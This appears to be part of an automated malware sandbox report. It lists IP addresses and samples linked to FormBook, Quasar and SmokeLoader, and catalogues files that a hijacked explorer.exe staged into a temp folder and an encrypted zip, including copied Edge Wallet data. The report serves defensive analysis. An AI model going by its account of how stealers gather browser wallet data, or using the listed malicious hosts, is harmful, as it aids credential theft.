                                                                                                                        • 162.213.249.216
                                                                                                                        1.cmdGet hashmaliciousUnknownBrowse
                                                                                                                        • 192.64.119.55
                                                                                                                        1.cmdGet hashmaliciousQuasarBrowse
                                                                                                                        • 192.64.119.55
                                                                                                                        https://livelovelead.coach/wp-admin/readme.htmlGet hashmaliciousPhisherBrowse
                                                                                                                        • 162.0.235.3
                                                                                                                        hH4dbIGfGT.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 162.0.236.169
                                                                                                                        DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 162.0.238.246

                                                                                                                        JA3 Fingerprints

                                                                                                                        No context

                                                                                                                        Dropped Files

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dllSecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                            C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dllSecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletProxy.dllSecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                  SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exeGet hashmaliciousSmokeLoaderBrowse

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Users\user\AppData\Local\Temp\BD1F.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):98304
                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\BD1F.tmp-shm

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32768
                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\C08B.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32768
                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\C281.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):40960
                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\C699.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20480
                                                                                                                                    Entropy (8bit):0.8475592208333753
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                                                                                                    MD5:BE99679A2B018331EACD3A1B680E3757
                                                                                                                                    SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                                                                                                    SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                                                                                                    SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\C794.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):106496
                                                                                                                                    Entropy (8bit):1.1373607036346451
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\C96A.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):51200
                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\CA26.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20480
                                                                                                                                    Entropy (8bit):0.6732424250451717
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\CB6F.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):196608
                                                                                                                                    Entropy (8bit):1.1209886597424439
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700.zip

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4617240
                                                                                                                                    Entropy (8bit):7.998473034600968
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:98304:zgETyEfTDRhXxx1nCbxWOYGC6bGrDUK3YBNltU7G2l3TJNnQC1:/fTDXxx2B0UK97JtNnj
                                                                                                                                    MD5:721A567C2E0250F6216B839C7313AA6C
                                                                                                                                    SHA1:7EF9527C7F1395F0A2C9EC67B3BA2DB8ECC0C332
                                                                                                                                    SHA-256:32A6ABD65A8EFAF6B9C1B475C8A7F0AE5049A2328842B89BF886E108E8BB144F
                                                                                                                                    SHA-512:7A65865B34307823081EF2563B792F2831BD7BA27D5676F69605F66F164429C2760596DB779990CF52DD4D916AB5DB72C99A8E0710C9DB56AF0A80F34CDE5E9A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:PK..........=W................C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json...r...}.O.c_.......*....I..x..AJ..../....L.....9p....UYYU.......w..6.b....]..........}...W.{^.....?[..v...9...e...O.../..=w....tK.`...?...fz.o?V...v....6...sw...}.......?.C{.......x../...=._..l..C......|...C.....fq.4.eg/l...Z7.e;..0h.k.w.....O_.l.e7\z^8..f./..L..}....>...e...O.k..Cs:..om.........[..C._w.v.........rn....X4...v<...~...n....mX.......N.r..auX...y..v....rx.....veK.:ur1..3.>..}.[7...n.~..E......^.m..`./,..`C.`Uw...9/...u.....a..mj.....=.v.e.l^..=.n.E.....z..&.........#q.}..S...V>]..`...\..4..m.......o....{p...f>..E{fHY..}.:..m..aq.Y.....mb.t..>!.......!K.E.l6v:,t.hu..^t.U......*<....2..;.n.....l.m...TC.j....Y.-;`..s.o.m.%.H..{..[].?.Z..<_.o..,...g]..q.n\w.v.g6s...\..{?..=.j...W#..8.T.=...Y[..qi...Ks[4...ER...>...%.....- ...Z_..v.8...,..'3M.....>.w..q.

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\mini-wallet.html

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (506)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1558
                                                                                                                                    Entropy (8bit):5.271192944455372
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:0c1HjWxXqxVWtXqxVg+vIuB0JDPPM2zWCPFwKhqFTA7v0KNA5qFNq6W4qA7BfnR8:0+Hq5qJYDPPZPF/Y6bDXqAtfhhH94Yhu
                                                                                                                                    MD5:5CA69BAAF837E965239677997944A95F
                                                                                                                                    SHA1:C17D7BE904F349E903DE787D4837724DD3FFB705
                                                                                                                                    SHA-256:96591346DA6F8CBA32C10B2FFA6F5F3851B696EFDC800767A51CAF882523A177
                                                                                                                                    SHA-512:C9549A4062FD3144D5EC91BACC95901DE944135484ABE15F6AB773050CD279656D9E53F47B7466EE09822D11AC1F4C3356A7B0DC311531359354355FFA95B42A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<!doctype html><html dir="$i18n{textdirection}" lang="$i18n{language}"><head><meta charset="utf-8"><meta version="39855961/20314 - 2023-09-29T14:48:20.320Z"><title>Mini Wallet</title><script defer="defer" src="/base-error-reporting.js"></script><script defer="defer" src="/wallet-error-reporting.js"></script><script src="chrome://resources/js/load_time_data.m.js" type="module"></script><script src="/strings.m.js" type="module"></script><style>/* Copyright (C) Microsoft Corporation. All rights reserved.. * Use of this source code is governed by a BSD-style license that can be. * found in the LICENSE file. */..body {. font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;. font-size: 14px;. background-color: rgb(247, 247, 247);. margin: 0;.}..@media (forced-colors:none) {. input::selection {. color: #FFF;. background: #0078D4;. }.}..@media (prefers-color-scheme: dark) {. body {. background-c

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65461)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):362915
                                                                                                                                    Entropy (8bit):5.641237841074662
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:2lucRdGqvLVgb+AEWKLeUFMrY3MWf9FE5PdwGvPJvUcr2GLA:lqveSryIMrY3M49OZqcrVs
                                                                                                                                    MD5:B717DBE5C65A167F15592CF7B5D69C40
                                                                                                                                    SHA1:12E83938CD956A85F0E801954019F5813E13C139
                                                                                                                                    SHA-256:36BD69A27956283AC59CEC3A9C6B843A6EC426FC9C4BFEB2BE849E46DECE2F29
                                                                                                                                    SHA-512:1FFE0ABED1C1B5CDA4E087F681BCC47F06288D79FD593D5ADA5EC4378D17B87BCB03369298C79EA2C074C9D54C7AE1226F0BFFABE5F3D785518476B616006B1D
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:/*! For license information please see miniwallet.bundle.js.LICENSE.txt */.(()=>{"use strict";var e={533:e=>{var t=Object.getOwnPropertySymbols,i=Object.prototype.hasOwnProperty,r=Object.prototype.propertyIsEnumerable;function o(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},i=0;i<10;i++)t["_"+String.fromCharCode(i)]=i;if("0123456789"!==Object.getOwnPropertyNames(t).map((function(e){return t[e]})).join(""))return!1;var r={};return"abcdefghijklmnopqrst".split("").forEach((function(e){r[e]=e})),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},r)).join("")}catch(e){return!1}}()?Object.assign:function(e,n){for(var a,s,l=o(e),c=1;c<arguments.length;c++){for(var d in a=Object(arguments[c]))i.call(a,d)&&(l[d]=a[d]);if(t){s=t(a);for(var u=0;u<s.length;u++)r.call(a,s[u])&&(l[s[u]]=a

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.LICENSE.txt

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):295
                                                                                                                                    Entropy (8bit):4.7070549789727645
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:U03WiGjs/TdMK1OmFsZ1FD+Dm3Jue9DOFTTgGHYVov10:U3kTHwmiCD6JuoqIfov10
                                                                                                                                    MD5:9FADCDA30B07120E2CB70B5A003ACFF9
                                                                                                                                    SHA1:A4EB198C6AE011CFB495A25D7C04B62FDD1D0346
                                                                                                                                    SHA-256:63EC623C2BDA74FC3E3D2796151FFE93255E8BD76B2D8BDFE2EA0B401848B15F
                                                                                                                                    SHA-512:E34A8BCE98AC7EEEB3416A9D2E8F331181A25E06467AA211AF4A12A88CEF0C5B2678792D03378F888C212EFF6340647AC99F97AA2CADB75C3777527FDDF77552
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:/*.object-assign.(c) Sindre Sorhus.@license MIT.*/../** @license React v16.14.0. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65458)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1394663
                                                                                                                                    Entropy (8bit):5.568332601544202
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:X6cIyB2Fx2Mr+Y2mHDvpttZwJbhTJrSK4VPYOI+AmOkmMOkxhdlrw+QsjZIQi6SI:X6cIyB2Fx2MrPbDvpttZwJbhTJrSK4VJ
                                                                                                                                    MD5:766E13C5EB1DC68F700EC491E912DF8A
                                                                                                                                    SHA1:94103276DECE118BE7182D565FFDB64A60452364
                                                                                                                                    SHA-256:223DCDC8779A51D6D07C349B7AA30B920D1C44834C17EA75E26C855A6FCECD3B
                                                                                                                                    SHA-512:A48F08DFCC53BC953C8C7E35E7FA587AFC09C90E806F0049C0F6684C543006554EBDDF0F4CB329E89823309CE0D41F7C202D7B9D2FA7025BE8A98853DAB6BF9E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:/*! For license information please see wallet-drawer.bundle.js.LICENSE.txt */.(()=>{var e,t,r,n,o,a,i,l,s={62928:function(e,t,r){var n;"undefined"!=typeof self&&self,n=function(e){return function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}return r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};retu

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txt

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1794
                                                                                                                                    Entropy (8bit):4.843900190800991
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:B9iDk8YzW0Tk3NtkiYi7oVwuwBA4uoqIfy+wBA4uoqIfyCwBA4uoqIfyrwBA4uoT:GD6xTmtUWIAfyIAfEIAflIAff
                                                                                                                                    MD5:DF3D44AC0E39EB1CA9318D0F07F746E2
                                                                                                                                    SHA1:7F6B92AC0574C3287C16FC7B49B9E0356FA7882B
                                                                                                                                    SHA-256:BA149E358C97FFDF1CB5B9E26D6A9D0F3E19A7692F306B0C87118AEFECE40A21
                                                                                                                                    SHA-512:0C8AE3D4FEC2227464F0DF6D5667EA9E62FB20BA876C5B80ECFB5DB3E76AF42EA8B8F8C5AB5FC69C141E7E7E3D9840927A15C1FAB64613786C1F9D13B826730C
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:/*.object-assign.(c) Sindre Sorhus.@license MIT.*/../*!..Copyright (c) 2018 Jed Watson...Licensed under the MIT License (MIT), see..http://jedwatson.github.io/classnames.*/../*!. * Copyright (c) Microsoft Corporation. All rights reserved.. * Licensed under the MIT License.. */../**. * CSS Vendor prefix detection and property feature testing.. *. * @copyright Oleg Slobodskoi 2015. * @website https://github.com/jsstyles/css-vendor. * @license MIT. */../**. * @license. * Lodash <https://lodash.com/>. * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>. * Released under MIT license <https://lodash.com/license>. * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>. * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors. */../** @license React v0.19.1. * scheduler.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICEN

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.html

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (589)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1878
                                                                                                                                    Entropy (8bit):5.224434099079608
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:0+KbicYkYDPPZPF/Y6bDXqAtfu2YvywpyNhiG5Biu:HJkYDHL/Y6bTqif/Y6bNhiNu
                                                                                                                                    MD5:BF04B54F7B88E9110E3C68B727C5BE0F
                                                                                                                                    SHA1:7669103AFC426A829A3BA405C5ADE227C1EB2319
                                                                                                                                    SHA-256:1F28EE5F31140BCB2B1F48C33D645E3B8D028D3C692B85893BB6E36A013E108E
                                                                                                                                    SHA-512:4DFFDEF0646382967E079A2A80EBEEF4B96992A99C488FC56ED5CA48D76971832F65BF72CEBCFB0CCF4B2CFCB67ECDD48CC55D7BAD42FB78314DAC1CED2CF3BC
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<!doctype html><html dir="$i18n{textdirection}" lang="$i18n{language}"><head><meta charset="utf-8"><meta version="39556161/20314 - 2023-09-19T07:33:23.720Z"><title>Wallet Express Checkout</title><script src="/app-setup.js"></script><script src="/base-error-reporting.js"></script><script src="/wallet-error-reporting.js"></script><script src="chrome://resources/js/load_time_data.m.js" type="module"></script><script src="/strings.m.js" type="module"></script><script src="./load-ec-i18n.bundle.js" type="module"></script><style>/* Copyright (C) Microsoft Corporation. All rights reserved.. * Use of this source code is governed by a BSD-style license that can be. * found in the LICENSE file. */..body {. font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;. font-size: 14px;. background-color: rgb(247, 247, 247);. margin: 0;.}..@media (forced-colors:none) {. input::selection {. color: #FFF;. backgrou

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):148293
                                                                                                                                    Entropy (8bit):3.883764865191623
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:QW55kRm55yQjL5BsAEiL/M+w4iRFc39bmvgvnZFSV0xFZo5d9j6m0P5msBfFV+45:QUOuKvMIG0Q15uo
                                                                                                                                    MD5:DB6D2A23747DD4AF1CB85A23DFDB773F
                                                                                                                                    SHA1:7A27AF150C82DDE8AD968080E4DC4EABE7D595AB
                                                                                                                                    SHA-256:98D2120E386148106F64F2D5C65F9CBC53C6F844429DE8446F3096E97B2BBB9B
                                                                                                                                    SHA-512:E9F749D06D3D9295F94F7119EBF78BD012831A2FE5786D06A84A65D70F8B9DFAF3E80808BB6A4C1982283F47E5F0E5C4A844DCC8B7C952434EAD3729FD89A272
                                                                                                                                    Malicious:false
